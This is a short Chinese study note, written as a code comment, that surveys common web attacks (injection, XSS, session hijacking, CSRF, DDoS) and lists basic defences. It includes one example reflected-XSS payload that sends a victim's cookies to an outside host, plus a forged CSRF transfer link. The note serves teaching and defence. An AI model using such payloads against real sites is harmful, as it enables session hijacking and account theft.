web安全

/**     * 包括了SQL注入、XPath注入、cgi命令执行，     * 还有XXS和会话劫持等。前三个的攻击主要是在服务端触发的，后二者的攻击则是侧重于客户端。     *     * 对于SQL注入、XPath注入、cgi命令执行这几个攻击，我们需要做的自然是对提交参数的过滤，     * 最好是前端过滤一遍，后端也过滤一遍（后端的过滤和拦截是最重要的，毕竟通过在浏览器禁用脚本的配置可以躲过前端的过滤）。     *     * XSS（cross-site scripting跨域脚本攻击）攻击也是最常见的WEB攻击之一     * 通过QQ群，或者通过群发垃圾邮件，来让其他人点击这个地址：     'book.com/search?name=<script>document.location='http://vajoy/get?cookie='+document.cookie</scrip这种便是XSS攻击中的一种，称为“Reflected XSS”——基于反射的XSS攻击，主要依靠站点服务端返回脚本，在客户端触发执行从而发起WEB攻击。     *     * 会话劫持的预防，可以走SSH协议、增强网络安全系统健壮性，也可以使用无序的UUID来替代通讯中的序列号码（而非逐步递增）     *     * CSRF(Cross Site Request Forgery)，即跨站请求伪造，是一种常见的Web攻击，     * 举个简单的例子来说明下CSRF的危害。用户登陆某银行网站，以Get请求的方式完成到另一银行的转账，     * 如：http://www.mybank.com/Transfer.php?toBankId=11&money=1000。     * 攻击者可构造另一危险链接http://www.mybank.com/Transfer.php?toUserId=100&money=1000并把该链接通过     * 一定方式发给受害者用户。受害者用户若在浏览器打开此链接，会将之前登陆后的cookie信息一起发送给银行网站，     * 服务器在接收到该请求后，确认cookie信息无误，会完成改请求操作，造成攻击行为完成。     * 攻击者可以构造CGI的每一个参数，伪造请求。这也是存在CSRF漏洞的最本质原因。     *     *     * 1. 永远不要相信客户端传来的任何信息，对这些信息都应先进行编码或过滤处理；     * 2. https 替换http     * 3. 对提交参数前台进行校验过滤     * 4. 对提交参数后台进行校验过滤（比如价格计算）     * 5。DDOS是利用一批受控制的僵尸主机向一台服务器主机发起的攻击，其攻击的强度和造成的威胁要比DOS严重很多，更具破坏性。     * 控制ip的访问，设立黑名单，如：maven中心仓库     * 6。XSS防范方法，代码里对用户输入的地方和变量都需要仔细检查长度和对”<”,”>”,”;”,”’”等字符做过滤，     * 避免直接在cookie 中泄露用户隐私，例如email、密码等等     * 7。对于CSRF攻击应用程序和用户进行交互过程中，特别是账户交易这种核心步骤，强制用户输入验证码，     * 才能完成最终请求。在通常情况下，验证码够很好地遏制CSRF攻击     *     *     */